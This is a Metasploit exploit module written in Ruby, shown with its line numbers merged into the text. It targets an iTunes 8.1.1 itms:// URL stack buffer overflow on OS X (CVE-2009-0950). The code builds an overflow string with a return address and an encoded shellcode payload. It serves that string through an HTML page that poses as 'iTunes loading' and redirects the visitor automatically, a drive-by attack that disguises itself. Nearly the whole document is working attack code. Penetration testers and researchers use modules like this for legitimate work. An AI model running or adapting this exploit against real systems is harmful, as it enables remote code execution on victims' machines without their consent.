Path: blob/master/modules/exploits/multi/browser/itms_overflow.rb
19611 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::HttpServer::HTML910# no popup required to visit itms:// URLs in Safari, so throw it in BAP11# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({13# :ua_name => HttpClients::SAFARI,14# :ua_maxver => "4.1",15# :ua_minver => "4.0.5",16# :javascript => false,17# :rank => NormalRanking,18# :os_name => OperatingSystems::MAC_OSX19# })2021def initialize(info = {})22super(23update_info(24info,25'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',26'Description' => %q{27This modules exploits a stack-based buffer overflow in iTunes28itms:// URL parsing. It is accessible from the browser and29in Safari, itms urls will be opened in iTunes automatically.30Because iTunes is multithreaded, only vfork-based payloads should31be used.32},33'Author' => [ 'Will Drewry <redpig[at]dataspill.org>' ],34'License' => MSF_LICENSE,35'References' => [36[ 'CVE', '2009-0950' ],37[ 'OSVDB', '54833' ],38[ 'URL', 'http://support.apple.com/kb/HT3592' ],39[ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]40],41'Payload' => {42'Space' => 1024, # rough estimate of what browsers will pass.43'DisableNops' => true, # don't pad out the space.44'BadChars' => '',45# The encoder must be URL-safe otherwise it will be automatically46# URL encoded.47'EncoderType' => Msf::Encoder::Type::AlphanumMixed,48'EncoderOptions' =>49{50'BufferRegister' => 'ECX', # See the comments below51'BufferOffset' => 3, # See the comments below52},53},54'Platform' => %w{osx},55'Targets' => [56[57'OS X',58{59'Platform' => [ 'osx' ],60'Arch' => ARCH_X86,61'Addr' => 'ATe'62},63]64],65'DisclosureDate' => '2009-06-01',66'DefaultTarget' => 0,67'Notes' => {68'Reliability' => UNKNOWN_RELIABILITY,69'Stability' => UNKNOWN_STABILITY,70'SideEffects' => UNKNOWN_SIDE_EFFECTS71}72)73)74end7576# Generate distribution script, which calls our payload using JavaScript.77def generate_itms_page(p)78# Set the base itms url.79# itms:// or itmss:// can be used. The trailing colon is used80# to start the attack. All data after the colon is copied to the81# stack buffer.82itms_base_url = "itms://:"83itms_base_url << rand_text_alpha(268) # Fill up the real buffer84itms_base_url << rand_text_alpha(16) # $ebx, $esi, $edi, $ebp85itms_base_url << target['Addr'] # hullo there, jmp *%ecx!86# The first '/' in the buffer will terminate the copy to the stack buffer.87# In addition, $ecx will be left pointing to the last 6 bytes of the heap88# buffer containing the full URL. However, if a colon and a ? occur after89# the value in ecx will point to that point in the heap buffer. In our90# case, it will point to the beginning. The ! is there to make the91# alphanumeric shellcode execute easily. (This is why we need an offset92# of 3 in the payload).93itms_base_url << "/:!?" # Truncate the stack buffer overflow and prep for payload94itms_base_url << p # Wooooooo! Payload time.95# We drop on a few extra bytes as the last few bytes can sometimes be96# corrupted.97itms_base_url << rand_text_alpha(4)9899# Use the pattern creator to simplify exploit creation :)100# itms_base_url << Rex::Text.pattern_create(1024,101# Rex::Text::DefaultPatternSets)102103# Return back an example URL. Using an iframe doesn't work with all104# browsers, but that's easy enough to fix if you need to.105return String(<<~EOS)106<html>107<head>108<title>iTunes loading . . .</title>109<meta http-equiv="refresh" content="0; url='#{itms_base_url}'">110</head>111<body>112<p>iTunes should open automatically, but if it doesn't, click to113<a href="#{itms_base_url}">continue</a>.</p>114</body>115</html>116EOS117end118119def on_request_uri(cli, request)120print_status("Generating payload...")121return unless (p = regenerate_payload(cli))122123# print_status("=> #{payload.encoded}")124print_status("=> #{payload.encoded.length} bytes")125126print_status("Generating HTML container...")127page = generate_itms_page(payload.encoded)128# print_status("=> #{page}")129print_status("Sending itms page")130131header = { 'Content-Type' => 'text/html' }132send_response_html(cli, page, header)133handler(cli)134end135end136137138